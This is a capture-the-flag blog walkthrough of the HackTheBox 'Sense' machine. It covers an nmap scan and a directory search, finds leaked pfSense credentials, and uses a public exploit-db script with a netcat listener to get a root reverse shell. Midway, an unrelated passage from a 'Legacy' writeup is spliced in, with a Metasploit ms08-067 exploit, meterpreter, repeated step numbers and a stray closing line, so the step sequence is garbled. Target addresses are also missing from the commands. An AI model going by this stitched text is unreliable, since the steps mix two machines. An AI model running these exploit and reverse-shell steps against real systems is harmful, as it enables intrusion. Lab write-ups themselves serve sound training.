HackTheBox – Sense Writeup

clock-img 26 Oct, 2021 
cat-img HackTheBox Writeups

HackTheBox – Sense Writeup

Sense is a beginner level FreeBSD machine released on 21 October 2017. The machine resides at It has a webserver running pfsense firewall which has a remote code execution vulnerability. This vulnerability gives us direct root access into the machine.

HackTheBox - Sense Writeup

Connecting to HTB Vpn:

1. First download the vpn file from the access page of hackthebox.eu

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4. You can access the machine at


1. Let’s start by performing a nmap scan our target at

nmap -sV -A -p- –script vuln

-sV : to get the service versions on each port

-A : to get information such as os details, traceroutes,ports etc

-p- : to scan all 65535 ports

–script vuln : to check for most common vulnerabilities

We get the following details from our scan

Sense Writeup walkthrough

Certified Ethical Hacking


2. We can see that only two port 80 and 443 are open

3. Since port 80 is open let’s navigate to the web server using our browser

4. On the home page we can see a login page with ‘pfsense’ banner

HTB sense writeup

5. Lets research more about pfsense using google. During my research I came to know that the default credentials for pfsense are admin:pfsense

6. But i tried those credentials and it did not log in. I also found out that pfsense has a remote command execution exploit which will give a shell but we need the credentials for the exploit to work

7. Since we are stuck here, let’s run a directory scan on the web server and check if there are any hidden directories or files.

I am using a tool called dirsearch and the dirbuster medium wordlist. You can use any directory scanner to achieve this. Dirb and Dirbuster are some of the inbuilt directory scanners in kali

python3 dirsearch.py -w
/usr/share/wordlists/directory-list-2.3-medium.txt -u -E -i 200

-w : to specify the wordlist

-u : to specify the web server

-E : to check for most common extensions

-i : to show only results with 200 status code

Dirsearch URL : https://github.com/maurosoria/dirsearch

8. The results of the directory scanning tells us that there is file called system-users.txt, so let’s check that out using our browser

Sense machine write-up

9. The file says the username is rohit and the password is the default, so it must be pfsense. With these credentials, we are able to log in to the pfsense application

10. From our research about pfsense we had found a python exploit which gives us remote code execution on the system

URL: https://www.exploit-db.com/exploits/43560

11. So let’s download this exploit and use it

6. We can see that there is a single exploit and that too a remote code execution so let’s choose this one

use exploit/windows/smb/ms08-067_netapi

7. After choosing the exploit w have to set the remote port and remote hosts which are going to attack


set RPORT 445

8. You can check whether all the options are properly set

show options

9. Now lets run our exploit with the following command


Legacy Writeup

10. Now we have a meterpreter shell on the system. Sometime it may take one to three tries for the exploit to work

11. You can who you are on the system by the meterpreter command


So now we are NT System that is we are the Administrator

12. After enumerating the system more you can see that the user flag is located in the desktop of the user john and the root flag is located at the desktop of the administrator

Thank You for Reading HackTheBox – Legacy Writeup

Don’t forget to check out our latest Blogs – HackTheBox – Sense Writeup

Gaining Access:

12. To use the exploit type the following command but replace the lhost,lport,rhost values with your values

python3 43560.py –rhost= –lhost= lport=1111
–username=rohit –password=pfsense

Before running the exploit set a netcat listener to catch the reverse connection on port 1111

nc -lvp 1111

13. Now lets run the exploit

Sense Writeup walkthrough

14. We can see that we got a reverse shell on our netcat listener and that too as root


Sense Writeup,HTB sense writeup,Sense

Don’t forget to check out our latest Blogs – TryHackMe Tomghost-Writeup


Training Calender